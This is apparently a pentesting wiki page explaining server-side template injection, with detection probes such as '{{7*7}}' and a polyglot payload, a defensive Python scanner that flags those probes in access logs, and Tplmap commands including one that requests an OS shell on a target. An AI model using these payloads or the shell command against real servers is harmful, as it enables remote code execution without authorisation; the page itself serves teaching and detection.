# SSTI

### What is SSTI?

Server-side template injection is a vulnerability where an attacker injects malicious input into a template in order to execute commands on the server side. It occurs when unvalidated user input is embedded directly into the template that the template engine evaluates, which can generally lead to remote code execution (RCE).

Some of the most popular template engines, grouped by language:

* PHP – Smarty, Twig
* Java – Velocity, FreeMarker
* Python – Jinja, Mako, Tornado
* JavaScript – Jade, Rage
* Ruby – Liquid

### How Does It Work?

For the sake of simplicity, imagine you're testing the parameter of the following request:

```http
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com

parameter=value
```

To detect the vulnerability, supply a polyglot payload as the parameter's value: a sequence of special characters that is syntactically invalid in most template languages, so a vulnerable endpoint typically responds with a template error, for example:

```http
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com

parameter=${{<%[%'"}}%\.
```

To identify the template engine, read the error message:

![](https://794785868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F5HSSdz0o2gP99PtxMWiZ%2Fuploads%2FQDslfu4JjuOpGutZB4KK%2F1.webp?alt=media&token=4f23a261-f346-4c92-8ab9-4cf095ceedd6)

If the error message does not reveal the template engine, test the known expression syntaxes of the popular engines and look for one that gets evaluated (the response contains 49 instead of the literal payload):

```
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```
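The same probe syntaxes are what a defender should look for in request logs. The following is an added example, not code from the original page: stdlib-only Python that scans constructed access-log lines for the probes and the polyglot shown above, URL-decoding each query parameter first because the payloads arrive percent-encoded. The log lines, the parameter name `name` and the function names `classify_ssti_probe` and `scan_access_log` are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Template-expression delimiters used by the probes above, keyed by the
# delimiter family (Jinja/Twig, FreeMarker/Velocity, ERB/JSP, Ruby/Pug style).
PROBE_PATTERNS = {
    "mustache ({{ }})": re.compile(r"\{\{.*?\}\}"),
    "dollar-brace (${ })": re.compile(r"\$\{.*?\}"),
    "erb/jsp (<%= %>)": re.compile(r"<%=?.*?%>"),
    "hash-brace (#{ })": re.compile(r"#\{.*?\}"),
}
# The polyglot opens every delimiter at once; its opener is distinctive.
POLYGLOT = re.compile(r"\$\{\{<%\[%")


def classify_ssti_probe(value: str) -> list:
    """Return the probe families present in one URL-encoded parameter value."""
    decoded = unquote_plus(value)  # %7B%7B7*7%7D%7D -> {{7*7}}
    hits = [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]
    if POLYGLOT.search(decoded):
        hits.insert(0, "polyglot")
    return hits


# Constructed sample access-log lines (not real traffic); the query string is
# percent-encoded as a web server would log it.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?name=John HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 510
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /page?name=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C. HTTP/1.1" 500 233
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /page?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 510
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page?name=Alice%20Smith HTTP/1.1" 200 512
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')


def scan_access_log(log: str) -> list:
    """Flag requests whose query parameters carry template-expression probes."""
    findings = []
    for line in log.splitlines():
        m = LOG_LINE.match(line)
        if not m or "?" not in m["path"]:
            continue
        for param in m["path"].split("?", 1)[1].split("&"):
            key, _, raw = param.partition("=")
            hits = classify_ssti_probe(raw)
            if hits:  # a 500 on a probe is the strongest signal that a template choked on it
                findings.append({"ip": m["ip"], "param": key, "status": int(m["status"]), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The root fix remains to pass user data into the template as context variables rather than concatenating it into the template source; this scan only tells you who is probing for the mistake.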

## Exploit

### Tools

#### [Tplmap](https://github.com/epinna/tplmap)

```bash
# Tplmap is a Python 2 tool; the * in the URL marks the injection point
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
# --level raises the detection effort; -e pins the engine instead of fingerprinting it
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```

Links:

* [PayloadsAllTheThings – Server Side Template Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md)
* [Cobalt – A Pentester's Guide to Server-Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [HackTricks – SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)
